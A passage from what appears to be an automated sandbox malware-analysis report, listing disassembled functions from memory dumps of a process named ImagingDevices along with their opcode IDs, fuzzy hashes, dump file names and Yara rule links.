                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 0c9fe790c6069a8744e92368b9d6750f5f4fe1f509bd5418a791ccdf81c5bd73
                                                                                                  • Instruction ID: 5df228dc37ab882966b161abeccc762b7310679e9a32123d3a7a87a9713cc83a
                                                                                                  • Opcode Fuzzy Hash: 0c9fe790c6069a8744e92368b9d6750f5f4fe1f509bd5418a791ccdf81c5bd73
                                                                                                  • Instruction Fuzzy Hash: 2931D172B106265BD754CE3AD880656F7E2FB88310B94863AD919C3B80E778FD61C7D0
                                                                                                  Function 004031E0 Relevance: .1, Instructions: 92COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497434362.0000000000401000.00000040.00000001.01000000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497429027.0000000000400000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_400000_ImagingDevices.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: f08ad9c402d135aadbb2d4faaed9ecad1f1557e9a286002b1a5f2d04b28cbb18
                                                                                                  • Instruction ID: de4d67f93e86eaf27a0d68d12a9961254fae9c7d37f3bec015ca2f60e506bfd2
                                                                                                  • Opcode Fuzzy Hash: f08ad9c402d135aadbb2d4faaed9ecad1f1557e9a286002b1a5f2d04b28cbb18
                                                                                                  • Instruction Fuzzy Hash: 30319F72A14A108FD368CE6DD941613B7E5AB8C310B418B6EE85ED7790DA78FD01CB84
                                                                                                  Function 008926F8 Relevance: .0, Instructions: 44COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
                                                                                                  • Instruction ID: ae60f1a22cb69339c42929c386561dfbe2ba494c769b5c8fdb3ed68af88c931e
                                                                                                  • Opcode Fuzzy Hash: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
                                                                                                  • Instruction Fuzzy Hash: D8F0AF21324559BFDF48FA989951A7A3396FB94300F68C039A949DB246D6219D408692
                                                                                                  Function 008D0101 Relevance: .0, Instructions: 31COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 918068312069b50acfbd4a9a4d65495103bc908bf178a7527bf00e793ba52eab
                                                                                                  • Instruction ID: 01c7ce6cf5c3ee3bb87584003b9cc20e4cf97365ee07633cffb879c73c3f34e7
                                                                                                  • Opcode Fuzzy Hash: 918068312069b50acfbd4a9a4d65495103bc908bf178a7527bf00e793ba52eab
                                                                                                  • Instruction Fuzzy Hash: 84F034722402089BCB1C8F08C4A1BA937A2FB90719F24812EE50ACF790D739E881CA94
                                                                                                  Function 008700EA Relevance: .0, Instructions: 20COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: cbe0db1d2b52d0aaccb08120e9b852ff341ff293b10dddf7f49feef1275075da
                                                                                                  • Instruction ID: 32e2e7e45ec4a1f8ea2e438a0f1b02d7170ac911d2d28172b006a9f1f3150717
                                                                                                  • Opcode Fuzzy Hash: cbe0db1d2b52d0aaccb08120e9b852ff341ff293b10dddf7f49feef1275075da
                                                                                                  • Instruction Fuzzy Hash: 0DE06571644A80CBC311DF188900B1AB2E4FB88B10F10883AE409C7750D778DA098962
                                                                                                  Function 0040AB17 Relevance: .0, Instructions: 14COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497434362.0000000000401000.00000040.00000001.01000000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497429027.0000000000400000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_400000_ImagingDevices.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 6adfed34e4d11b18b003a1d8dade06ca9000d8283b5ddeecbe4a2a3bde6e4b59
                                                                                                  • Instruction ID: ae2d6d2b2e77ad23a362bc03d96ef037974236a2093d28c717d963bf66ce03d1
                                                                                                  • Opcode Fuzzy Hash: 6adfed34e4d11b18b003a1d8dade06ca9000d8283b5ddeecbe4a2a3bde6e4b59
                                                                                                  • Instruction Fuzzy Hash: EFC08C3E949288C6DF2AE26875952ECFF88FC8102874C29DBCDCC2EC81C20084A2C3C1
                                                                                                  Function 008800C4 Relevance: .0, Instructions: 6COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                                                                  • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                                                                                  • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                                                                  • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                                                                                  Function 008810D0 Relevance: .0, Instructions: 6COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
                                                                                                  • Instruction ID: b97e0867cf63cce6a7bd091cca7d2f61d4937398616a74d9d7050cc2a0bd1794
                                                                                                  • Opcode Fuzzy Hash: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
                                                                                                  • Instruction Fuzzy Hash: E8B01272180540CBE3199718E906F5FB710FB90F00F00C93EA00781C50DA389D3CD446
                                                                                                  Function 00880048 Relevance: .0, Instructions: 6COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                                                                  • Instruction ID: 41e4343c146f66e2bb318e135f4e172b2897deff735033a37a94e91f6413aa4b
                                                                                                  • Opcode Fuzzy Hash: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                                                                  • Instruction Fuzzy Hash: DBB012B2100540C7E3099714D946B4B7210FB90F00F40C93BA11B81861DB3C993CD46A
                                                                                                  Function 00880060 Relevance: .0, Instructions: 6COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
                                                                                                  • Instruction ID: 5a023e870da9c1ddb48dfa425d4b1b106951aaa9a6b60f468992a3f00291b547
                                                                                                  • Opcode Fuzzy Hash: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
                                                                                                  • Instruction Fuzzy Hash: 5CB012B2100580C7E30D9714DD06B4B7210FB80F00F00893AA10B81861DB7C9A2CD45E
                                                                                                  Function 00880078 Relevance: .0, Instructions: 6COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                                                                  • Instruction ID: 3a645d05db048e5a2937cf36c3d58d647fc753ae06e93f94360992995f7f05c0
                                                                                                  • Opcode Fuzzy Hash: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                                                                  • Instruction Fuzzy Hash: 2AB012B1504640C7F304F704D905B16B212FBD0F00F408938A14F86591D73DAD2CC78B
                                                                                                  Function 008801D4 Relevance: .0, Instructions: 6COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
                                                                                                  • Instruction ID: 018f436d7687ff9142db90ebed9d2f0c0dfd000868ccafab48d689f3c6447ef1
                                                                                                  • Opcode Fuzzy Hash: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
                                                                                                  • Instruction Fuzzy Hash: B2B01272100940C7E359A714ED46B4B7210FB80F01F00C93BA01B81851DB38AA3CDD96
                                                                                                  Function 0088010C Relevance: .0, Instructions: 6COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
                                                                                                  • Instruction ID: 6f78205b53d22ab4e8c81d7e3ead40d6172b524c4c965a7ad5e52c730ffb8076
                                                                                                  • Opcode Fuzzy Hash: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
                                                                                                  • Instruction Fuzzy Hash: B8B01273104D40C7E3099714DD16F4FB310FB90F02F00893EA00B81850DA38A92CC846
                                                                                                  Function 00881148 Relevance: .0, Instructions: 6COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
                                                                                                  • Instruction ID: 165250f8074bc0ef9cdc504fa449021ea13c8322197c03fc884fef66fc1cad38
                                                                                                  • Opcode Fuzzy Hash: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
                                                                                                  • Instruction Fuzzy Hash: 23B01272140580C7E31D9718D906B5B7610FB80F00F008D3AA04781CA1DBB89A2CE44A
                                                                                                  Function 0087F8CC Relevance: .0, Instructions: 6COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 33242f20aaab27225aff268df6c25d5fe4c2b5540d13ace685107ef1cdf40795
                                                                                                  • Instruction ID: b608c8617bc096b37df9be2f0bc93e64f466faa20b7dbfb3ee59c54b4bfc8c85
                                                                                                  • Opcode Fuzzy Hash: 33242f20aaab27225aff268df6c25d5fe4c2b5540d13ace685107ef1cdf40795
                                                                                                  • Instruction Fuzzy Hash: EBB01275100540C7F304D704D905F4AB311FBD0F04F40893AE40786591D77EAD28C697
                                                                                                  Function 0087F900 Relevance: .0, Instructions: 6COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                                                                  • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                                                                                  • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                                                                  • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                                                                                  Function 00881930 Relevance: .0, Instructions: 6COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 24bb0b37ea7353fce174200a7558970e7d293f02c0796de48d820b1db3e8008e
                                                                                                  • Instruction ID: 3aeeca65ea1aaf37b62c9893cb2d02334d47a3b29990fed3fb0e6cbc500f1d8d
                                                                                                  • Opcode Fuzzy Hash: 24bb0b37ea7353fce174200a7558970e7d293f02c0796de48d820b1db3e8008e
                                                                                                  • Instruction Fuzzy Hash: 52B01272100940C7E34AA714DE07B8BB210FBD0F01F00893BA04B85D50D638A92CC546
                                                                                                  Function 0087F938 Relevance: .0, Instructions: 6COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 4f2cab816673a0835cc858cab12777882f58cc76e03a07139f76655cd686d1a0
                                                                                                  • Instruction ID: d523cc507bde657408e54325c2dcaf12b60df831943b7985b4c6fe4931788f26
                                                                                                  • Opcode Fuzzy Hash: 4f2cab816673a0835cc858cab12777882f58cc76e03a07139f76655cd686d1a0
                                                                                                  • Instruction Fuzzy Hash: FCB0927220194087E2099B04D905B477251EBC0B01F408934A50646590DB399928D947
                                                                                                  Function 0087FAB8 Relevance: .0, Instructions: 6COMMON
                                                                                                  Download Yara Rule
